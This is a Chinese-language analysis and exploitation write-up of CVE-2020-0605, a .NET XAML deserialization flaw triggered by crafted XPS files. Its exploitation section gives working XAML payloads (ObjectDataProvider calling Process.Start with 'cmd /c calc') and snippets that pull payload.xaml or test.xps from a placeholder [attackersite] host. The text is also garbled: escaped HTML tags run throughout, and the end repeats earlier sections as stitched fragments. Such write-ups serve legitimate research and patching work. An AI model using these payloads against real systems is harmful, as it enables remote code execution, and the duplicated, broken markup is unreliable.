CVE-2020-0605：.NET处理XPS文件时的命令执行漏洞分析与利用<\/h1>

1. 漏洞概述<\/h2>
CVE-2020-0605是一个存在于.NET框架中处理XPS文件时的反序列化漏洞，攻击者可以通过构造恶意的XPS文件实现远程代码执行。该漏洞影响所有使用.NET处理XPS文件的业务场景。<\/p>

2. 背景知识<\/h2>

2.1 XPS文件格式<\/h3>

XPS (XML Paper Specification)是微软开发的文档格式，作为PDF的替代品：<\/p>

本质是一个压缩包，包含多种文件类型<\/li>
包含图像、字体和XML文档<\/li>

.NET使用XAML来序列化处理XPS文件中的XML文件<\/li> <\/ul>

2.2 典型XPS文件结构<\/h3>

File.xps\DiscardControl.xml
File.xps\FixedDocumentSequence.fdseq
File.xps\[Content_Types].xml
File.xps\Documents\1\FixedDocument.fdoc
File.xps\Documents\1\Pages\1.fpage
File.xps\Documents\1\Pages\_rels\1.fpage.rels
File.xps\Documents\1\_rels\FixedDocument.fdoc.rels
File.xps\Metadata\Job_PT-inqy3ql9shqm2dc_mcqr93k5g.xml
File.xps\Metadata\SharedEmpty_PT-cn4rss5oojtjhxzju9tpamz4f.xml
File.xps\Resources\Fonts\0D7703BF-30CA-4254-ABA0-1A8892E2A101.odttf
File.xps\Resources\Images\00F8CA61-B050-4B6A-AFEF-139AA015AC08.png
File.xps\_rels\.rels
File.xps\_rels\FixedDocumentSequence.fdseq.rels
<\/code><\/pre>
3. 漏洞技术分析<\/h2>
3.1 漏洞根源<\/h3>
漏洞存在于System.Windows.Documents.XpsValidatingLoader<\/code>内部类的Load()<\/code>和Validate()<\/code>方法中，这些方法在处理恶意XAML指令时会调用XamlReader.Load()<\/code>方法，导致代码执行。<\/p>
3.2 受影响类调用链<\/h3>
System.Windows.Documents.XpsValidatingLoader (内部类)
    ├─ Load()方法
    │   ├─ 被PageContent类调用
    │   ├─ 被FixedDocument类调用
    │   └─ 被DocumentReference类调用
    └─ Validate()方法
        └─ 被FixedDocument类调用
<\/code><\/pre>
3.3 漏洞利用条件<\/h3>

应用程序使用.NET框架处理XPS文件<\/li>
不受XPS Viewer影响（因为它不调用.NET处理XPS文件）<\/li>
<\/ul>
4. 漏洞利用方法<\/h2>
4.1 通用利用Payload<\/h3>
ysoserial项目提供的通用利用代码：<\/p>
<ResourceDictionary<\/span>
<\/span><\/span>    xmlns=<\/span>"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\/presentation"<\/span>
<\/span><\/span>    xmlns:x=<\/span>"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml"<\/span>
<\/span><\/span>    xmlns:System=<\/span>"clr-namespace:System;assembly=mscorlib"<\/span>
<\/span><\/span>    xmlns:Diag=<\/span>"clr-namespace:System.Diagnostics;assembly=system"<\/span>><\/span>
<\/span><\/span>    <ObjectDataProvider<\/span> x:Key=<\/span>"LaunchCalc"<\/span>
<\/span><\/span>        ObjectType=<\/span>"{x:Type Diag:Process}"<\/span>
<\/span><\/span>        MethodName=<\/span>"Start"<\/span>><\/span>
<\/span><\/span>        <ObjectDataProvider.MethodParameters><\/span>
<\/span><\/span>            <System:String><\/span>cmd<\/System:String><\/span>
<\/span><\/span>            <System:String><\/span>\/c calc<\/System:String><\/span>
<\/span><\/span>        <\/ObjectDataProvider.MethodParameters><\/span>
<\/span><\/span>    <\/ObjectDataProvider><\/span>
<\/span><\/span><\/ResourceDictionary><\/span>
<\/span><\/span><\/code><\/pre>4.2 利用场景示例<\/h3>
场景1：通过XpsDocument类加载<\/h4>
XpsDocument myDoc = new<\/span> XpsDocument(@"http:\/\/[attackersite]\/test.xps"<\/span>, FileAccess.Read);
<\/span><\/span>var<\/span> a = myDoc.GetFixedDocumentSequence();
<\/span><\/span><\/code><\/pre>场景2：通过打印队列加载<\/h4>
PrintQueue defaultPrintQueue = LocalPrintServer.GetDefaultPrintQueue();
<\/span><\/span>PrintSystemJobInfo xpsPrintJob = defaultPrintQueue.AddJob("test"<\/span>, @"http:\/\/[attackersite]\/test.xps"<\/span>, false<\/span>);
<\/span><\/span><\/code><\/pre>4.3 具体利用方式<\/h3>
方式1：FixedDocument\/FixedDocumentSequence + xaml引用<\/h4>
<FixedDocument<\/span> xmlns=<\/span>"http:\/\/schemas.microsoft.com\/xps\/2005\/06"<\/span>><\/span>
<\/span><\/span>    <PageContent<\/span> Source=<\/span>"http:\/\/[attackersite]\/payload.xaml"<\/span> Height=<\/span>"1056"<\/span> Width=<\/span>"816"<\/span> \/><\/span>
<\/span><\/span><\/FixedDocument><\/span>
<\/span><\/span><\/code><\/pre>或<\/p>
<FixedDocumentSequence<\/span> xmlns=<\/span>"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\/presentation"<\/span>><\/span>
<\/span><\/span>    <DocumentReference<\/span> Source=<\/span>"http:\/\/[attackersite]\/payload.xaml"<\/span> \/><\/span>
<\/span><\/span><\/FixedDocumentSequence><\/span>
<\/span><\/span><\/code><\/pre>方式2：利用FixedDocument\/FixedDocumentSequence的Resources属性<\/h4>
<FixedDocument<\/span> xmlns=<\/span>"http:\/\/schemas.microsoft.com\/xps\/2005\/06"<\/span> 
<\/span><\/span>    xmlns:sd=<\/span>"clr-namespace:System.Diagnostics;assembly=System"<\/span> 
<\/span><\/span>    xmlns:x=<\/span>"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml"<\/span>><\/span>
<\/span><\/span>    <FixedDocument.Resources><\/span>
<\/span><\/span>        <ObjectDataProvider<\/span> MethodName=<\/span>"Start"<\/span> x:Key=<\/span>""<\/span>><\/span>
<\/span><\/span>            <ObjectDataProvider.ObjectInstance><\/span>
<\/span><\/span>                <sd:Process><\/span>
<\/span><\/span>                    <sd:Process.StartInfo><\/span>
<\/span><\/span>                        <sd:ProcessStartInfo<\/span> Arguments=<\/span>"\/c calc"<\/span> FileName=<\/span>"cmd"<\/span> \/><\/span>
<\/span><\/span>                    <\/sd:Process.StartInfo><\/span>
<\/span><\/span>                <\/sd:Process><\/span>
<\/span><\/span>            <\/ObjectDataProvider.ObjectInstance><\/span>
<\/span><\/span>        <\/ObjectDataProvider><\/span>
<\/span><\/span>    <\/FixedDocument.Resources><\/span>
<\/span><\/span><\/FixedDocument><\/span>
<\/span><\/span><\/code><\/pre>或<\/p>
<FixedDocumentSequence<\/span> xmlns=<\/span>"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml\/presentation"<\/span> 
<\/span><\/span>    xmlns:sd=<\/span>"clr-namespace:System.Diagnostics;assembly=System"<\/span> 
<\/span><\/span>    xmlns:x=<\/span>"http:\/\/schemas.microsoft.com\/winfx\/2006\/xaml"<\/span>><\/span>
<\/span><\/span>    <FixedDocumentSequence.Resources><\/span>
<\/span><\/span>        <ObjectDataProvider<\/span> MethodName=<\/span>"Start"<\/span> x:Key=<\/span>""<\/span>><\/span>
<\/span><\/span>            <ObjectDataProvider.ObjectInstance><\/span>
<\/span><\/span>                <sd:Process><\/span>
<\/span><\/span>                    <sd:Process.StartInfo><\/span>
<\/span><\/span>                        <sd:ProcessStartInfo<\/span> Arguments=<\/span>"\/c calc"<\/span> FileName=<\/span>"cmd"<\/span> \/><\/span>
<\/span><\/span>                    <\/sd:Process.StartInfo><\/span>
<\/span><\/span>                <\/sd:Process><\/span>
<\/span><\/span>            <\/ObjectDataProvider.ObjectInstance><\/span>
<\/span><\/span>        <\/ObjectDataProvider><\/span>
<\/span><\/span>    <\/FixedDocumentSequence.Resources><\/span>
<\/span><\/span><\/FixedDocumentSequence><\/span>
<\/span><\/span><\/code><\/pre>5. 补丁情况<\/h2>

微软在2020年1月发布了初始补丁，但仅增加了对.fdseq格式文件的安全校验<\/li>
2020年5月发布了完善的补丁，彻底修复了该漏洞<\/li>
<\/ul>
6. 防御建议<\/h2>

及时安装微软发布的最新安全补丁<\/li>
对处理XPS文件的应用程序进行输入验证<\/li>
在不需要处理XPS文件的系统中禁用相关功能<\/li>
使用应用程序白名单限制未知XPS文件的执行<\/li>
<\/ol>
7. 研究价值<\/h2>
该漏洞的利用思路可以用于开发其他XAML反序列化漏洞的利用链，为安全研究人员提供了有价值的参考。<\/p>

CVE-2020-0605：.NET处理XPS文件时的命令执行漏洞分析与利用<\/h1>

1. 漏洞概述<\/h2> CVE-2020-0605是一个存在于.NET框架中处理XPS文件时的反序列化漏洞，攻击者可以通过构造恶意的XPS文件实现远程代码执行。该漏洞影响所有使用.NET处理XPS文件的业务场景。<\/p>

2. 背景知识<\/h2>

3. 漏洞技术分析<\/h2>

3.1 漏洞根源<\/h3> 漏洞存在于System.Windows.Documents.XpsValidatingLoader<\/code>内部类的Load()<\/code>和Validate()<\/code>方法中，这些方法在处理恶意XAML指令时会调用XamlReader.Load()<\/code>方法，导致代码执行。<\/p>

4. 漏洞利用方法<\/h2>

4.2 利用场景示例<\/h3>

4.3 具体利用方式<\/h3>

7. 研究价值<\/h2> 该漏洞的利用思路可以用于开发其他XAML反序列化漏洞的利用链，为安全研究人员提供了有价值的参考。<\/p>

1. 漏洞概述<\/h2>
CVE-2020-0605是一个存在于.NET框架中处理XPS文件时的反序列化漏洞，攻击者可以通过构造恶意的XPS文件实现远程代码执行。该漏洞影响所有使用.NET处理XPS文件的业务场景。<\/p>

3.1 漏洞根源<\/h3>
漏洞存在于`System.Windows.Documents.XpsValidatingLoader<\/code>内部类的Load()<\/code>和Validate()<\/code>方法中，这些方法在处理恶意XAML指令时会调用XamlReader.Load()<\/code>方法，导致代码执行。<\/p>`

7. 研究价值<\/h2>
该漏洞的利用思路可以用于开发其他XAML反序列化漏洞的利用链，为安全研究人员提供了有价值的参考。<\/p>